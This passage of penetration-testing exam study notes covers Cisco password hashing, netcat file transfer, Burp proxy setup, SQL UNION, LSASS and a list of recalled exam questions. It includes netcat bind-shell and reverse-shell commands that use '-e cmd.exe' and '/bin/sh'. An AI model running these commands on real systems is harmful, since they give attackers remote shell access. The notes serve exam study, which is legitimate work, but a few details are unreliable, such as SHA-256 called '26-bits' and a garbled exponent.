hashed when in Run/Start Files using PBKDF2-SHA-256 starting from IOS 15.3(3). Password-Based Key Derivation Function 2 (PBKDF2) with Secure Hash Algorithm, 26-bits (SHA-256) as the hashing algorithm R1(config)#enable algorithm-type sha256 secret cisco R1(config)#do sh run | i enable enable secret 8 $8$mTj4RZG8N9ZDOk$elY/asfm8kD3iDmkBe3hD2r4xcA/0oWS5V3os.O91u. Type 9 - The password will be hashed in Run/Start Files using scrypt as the hashing algorithm starting from IOS 15.3(3) R1(config)#ena algorithm-type scrypt secret cisco R1(config)#do sh run | i enable enable secret 9 $9$WnArItcQHW/uuE$x5WTLbu7PbzGDuv0fSwGKS/KURsy5a3WCQckmJp0MbE Netcat Configuration Transferring a File – (Output is Input…) nc -l -p 4444 >output.txt # Receiving End nc <IP Address> port < input.txt # Sending End
- 75. nc -l -p 1234 > out.file # Receiving End nc -w 3 [destination] 1234 < out.file # Sending End Set up a Netcat Bind Shell (Windows) nc -l -p 4444 -e cmd.exe nc <IP Address> 4444 # Connect to the shell Set up a Netcat Bind Shell (Linux) nc -l -p 4444 -e /bin/sh nc <IP Address> 4444 # Connect to the shell Set up a Netcat Reverse Shell (Windows) The (compromised host) connects to me, where I have my -l ready. The-e runs on compromised host, not my local, hence reverse shell. nc -l -p 443 # Attacker listening for connection nc <IP Address> 443 -e cmd.exe -v verbose -l listen -p port -n supress name/port resolutions -e execute -w timeout - has no effect on the -l option. The default is no timeout. nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx The -s binds ``in front of'' some services that may already be listening on those ports (but will shut that port down). Use of | - Pipe takes the output of one command and makes it usable for a following command. Output from the left-hand command is passed directly to the input for the command on the right-hand side of the pipe. Example: cat ./somefile | grep cool - Takes the output of somefile and make it available for grep, and then grep will print all lines with the word cool in it. Hence in netcat case on receiving side it’ll be on left hand side after which pipe right hand side can process it, such as: nc -l -p 1234 | uncompress -c | tar xvfp - On sending side it’ll have to be on right hand side with left hand side being the element which manipulates the file, such as: tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234 The type command will display the command name's path, or other information (such as alias): $ type cp cp is /bin/cp $ type unknown unknown not found $ type type type is a shell builtin Password Combinations 8-character password consisting of 26 lower case alphabet and 10 numerical = 368 = 2821109907456 (verified on calculator) Web Testing App Proxy Configurations Client Side Certificates: When testing with a client side certificate (often used for authentication purposes), it needs to be installed on the testing proxy server (Client Certificate in Burp's User Options/SSL, Options/SSL menu fails to load upon restore if client certificate, Options / SSL / Client SSL Certificates, Usage of Certificates)
- 76. Thick Clients: If the application in question is sending HTTP traffic, it is possible to intercept it using burp with its invisible proxy option under proxy listeners. Echo Mirage, Canape are similar tools which are designed for thick clients. Can also use TCP dump or Wireshark if traffic is non-HTTP such as FTP. UNION Statement The UNION operator is used to combine the result-set of two or more SELECT statements. Each SELECT statement within UNION must have the same number of columns (balanced?) The columns must also have similar data types The columns in each SELECT statement must also be in the same order SELECT City FROM Customers UNION SELECT City FROM Suppliers ORDER BY City; In the above example Customer and Suppliers are the tables, and City is the column. Based on UNION syntax you cannot have for example: SELECT City, PostalCode FROM Customers UNION SELECT City FROM Suppliers ORDER BY City; TTY "tty" originally meant "teletype" and "pty" means "pseudo-teletype". In UNIX, /dev/tty* is any device that acts like a "teletype", ie, a terminal. (Called teletype because that's what we had terminals for) A tty command in Linux and other Unix-like operating systems is a shell command that can be entered interactively or as part of a script to determine whether the output for the script is a terminal (that is, to an interactive user) or to some other destination such as another program or a printer. Password Only Login Prompt One suspects it’s a Cisco switch. Windows LSASS Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens. Notes: What is Oracle and PL SQL? - In Oracle database management, PL/SQL is a procedural language extension to Structured Query Language (SQL). The purpose of PL/SQL is to combine database language and procedural programming language. STP:
- 77. To add from passing exam: PING with record-route – which header is updated – I put IP header ARP – WHO HAS broadcast DNS Zone transfer port (TCP 53) .NET machine.config – Input Validation Unix password management – list of crypto algorithms – asks which one not used – selected MD4 TCP initial sequence – get no reply from a TCP connection ECB encryption TCP 2301? – Which OS? (MacOS listed also…) Netcat file transfer – only logical one was using type file.txt | nc targethost – from notes this makes no sense, but was only one it could have been? Netcat -u for UDP port listening? MS tracert uses ICMP and UNIX Traceroute uses UDP – confirm? In traceroute how do you know host has been reached – Host will sent port unreachable NFS share with root squash – lists 3 files with various UID and GID’s (some 0 for root?) – asks which one can be changed by messing about… MS SQL – output of string which it says is password – asks which field has salt, but not as separated by $ so makes no sense? Well configured Checkpoint FW on same LAN, will it respond to layer 2 ARP? Get port numbers of Real Time Protocol – RTP Tried to confuse you – REMOVE – it is not a valid HTTP method. What is SSL downgrade attack? You download webpage – so its HTML over HTTP over SSL Organisation element of MAC address – first 2 bytes, 4 bytes? Where is SA password stored, in Master DB – which table? Does MS SQL use .. for example master..syslogin? TCP wrapper – Permit and Deny file names? Msbin1 encoding – used for what, plaintext? Linux /opt folder with PDF listing. HTTP parameter set to it to browse - Linux host and possible directory transversal attacks... ESP is part of IPsec, which runs on UDP 500. A packet sent to it will ellicit a UDP responce of nothing...you put it'll get a TCP responce... HTTP request smugling Parameters should only be in POST, not GET? sip configuration file, sip referer header? (2) Client side certificate being issued, then configured for proxy for web app testing? .net machine.config .net input validation